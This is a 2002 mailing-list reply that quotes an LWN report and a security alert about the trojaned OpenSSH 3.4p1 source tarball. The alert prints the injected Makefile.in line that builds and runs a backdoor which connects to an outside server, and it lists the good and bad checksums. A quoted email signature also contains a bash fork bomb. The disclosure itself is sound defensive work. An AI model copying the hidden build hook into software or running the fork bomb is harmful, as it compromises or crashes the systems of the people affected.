savannah-hackers
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Savannah-hackers] Re: OpenSSH 3.4p1 trojaned

From: Jeff Bailey
Subject: [Savannah-hackers] Re: OpenSSH 3.4p1 trojaned
Date: Thu, 1 Aug 2002 11:57:58 -0700
User-agent: Mutt/1.3.28i 
the Debian package isn't affected, either source or binary.

On Thu, Aug 01, 2002 at 02:55:41PM -0400, Mark H. Weaver wrote:
> http://lwn.net/Articles/6524/
> 
> [...]
> 
> Trojan horse in OpenSSH 3.4p1 source distribution
> 
>    From:      Mikael Olsson <address@hidden>
>    To:        address@hidden
>    Subject:   openssh-3.4p1.tar.gz distribution recently trojaned
>    Date:      Thu, 01 Aug 2002 13:20:47 +0200
> 
> 
> From
> [27]http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-secur
> ity
> 
> ----- Forwarded message from Edwin Groothuis <address@hidden> -----
> 
> Date: Thu, 1 Aug 2002 16:55:51 +1000
> From: Edwin Groothuis <address@hidden>
> To: address@hidden
> Subject: openssh-3.4p1.tar.gz trojaned
> 
> Greetings,
> 
> Just want to inform you that the OpenSSH package op ftp.openbsd.org
> (and probably all its mirrors now) it trojaned:
> 
>     
> [28]ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
> 
> The OpenBSD people have been informed about it (via email to
> address@hidden and via irc.openprojects.org/#openbsd)
> 
> 
> The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
>  all: libopenbsd-compat.a
> +       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
> ./bf-test.out &
> 
> bf-test.c[1] is nothing more than a wrapper which generates a
> shell-script[2] which compiles itself and tries to connect to an
> server running on 203.62.158.32:6667 (web.snsonline.net).
> 
> [1] [29]http://www.mavetju.org/~edwin/bf-test.c
> [2] [30]http://www.mavetju.org/~edwin/bf-output.sh
> 
> This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
> ports system:
>     MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
> 
> This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
>     MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
> 
> Edwin
> 
> --
> Edwin Groothuis      |            Personal website: [31]http://www.MavEtJu.org
> address@hidden    |    Weblog: [32]http://www.mavetju.org/weblog/weblog.php
> bash$ :(){ :|:&};:   | Interested in MUDs? [33]http://www.FatalDimensions.org/
>    __________________________________________
> 
>    ([34]Log in to post comments)
> 
>      Trojan horse in OpenSSH 3.4p1 source distribution
>    (Posted Aug 01, 2002 15:07 UTC (Thu) by craighagan) ([35]Post reply)
> 
>    This appears to be a FreeBSD ports thing. I build from
>    sources downloaded from the openssh website within 24 hours
>    of the release. I've double-checked said sources and
>    do *not* see either the Makefile.in modification
>    nor the bf-test.c source via find.
> 
>    I recommend other folks check their sources so that
>    either the ports origin -- or a hack at openssh's distribution
>    point can be confirmed.
> 
>      Trojan horse in OpenSSH 3.4p1 source distribution
>    (Posted Aug 01, 2002 15:08 UTC (Thu) by craighagan) ([36]Post reply)
> 
>    silly me. i forgot that -ports ftp's the software upon build.
> 
>      Trojan horse in OpenSSH 3.4p1 source distribution
>    (Posted Aug 01, 2002 16:22 UTC (Thu) by erat) ([37]Post reply)
> 
>    I built 3.4p1 last night from a tarball downloaded from openssh.com.
>    No trojan found, and the checksum matched the "good" checksum from the
>    security alert.
> 
>                      Copyright ()) 2002, Eklektix, Inc.
>            Linux (.) is a registered trademark of Linus Torvalds
>                  Web hosting provided by [38]Rackspace.com.
> 
> References
> 
>    1. http://lwn.net/
>    2. http://php.lwn.net/corp/advertise/text/visit.php3?adid=382
>    3. http://php.lwn.net/mediakit/index.php3?s=t
>    4. http://lwn.net/login
>    5. http://lwn.net/newaccount
>    6. http://lwn.net/Articles/5712/
>    7. http://lwn.net/Articles/5052/
>    8. http://lwn.net/Articles/4553/
>    9. http://lwn.net/Articles/4151/
>   10. http://lwn.net/Articles/3668/
>   11. http://lwn.net/Articles/6524/?format=printable
>   12. http://lwn.net/
>   13. http://lwn.net/current/
>   14. http://lwn.net/Archives/
>   15. http://lwn.net/security
>   16. http://www.linuxcalendar.com/
>   17. http://old.lwn.net/Distributions/
>   18. http://old.lwn.net/Gallery/
>   19. http://lwn.net/KernelPatches/
>   20. http://old.lwn.net/stocks
>   21. http://old.lwn.net/
>   22. http://lwn.net/op/About.lwn/
>   23. http://php.lwn.net/corp/donate/
>   24. http://lwn.net/mediakit
>   25. http://lwn.net/headlines/
>   26. http://lwn.net/op/Privacy.lwn/
>   27. 
> http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
>   28. ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
>   29. http://www.mavetju.org/~edwin/bf-test.c
>   30. http://www.mavetju.org/~edwin/bf-output.sh
>   31. http://www.MavEtJu.org/
>   32. http://www.mavetju.org/weblog/weblog.php
>   33. http://www.FatalDimensions.org/
>   34. http://lwn.net/login
>   35. http://lwn.net/Articles/6547/comment
>   36. http://lwn.net/Articles/6550/comment
>   37. http://lwn.net/Articles/6560/comment
>   38. http://www.rackspace.com/
> 

-- 
I reincarnated for this?
reply via email to
[Prev in Thread] Current Thread [Next in Thread]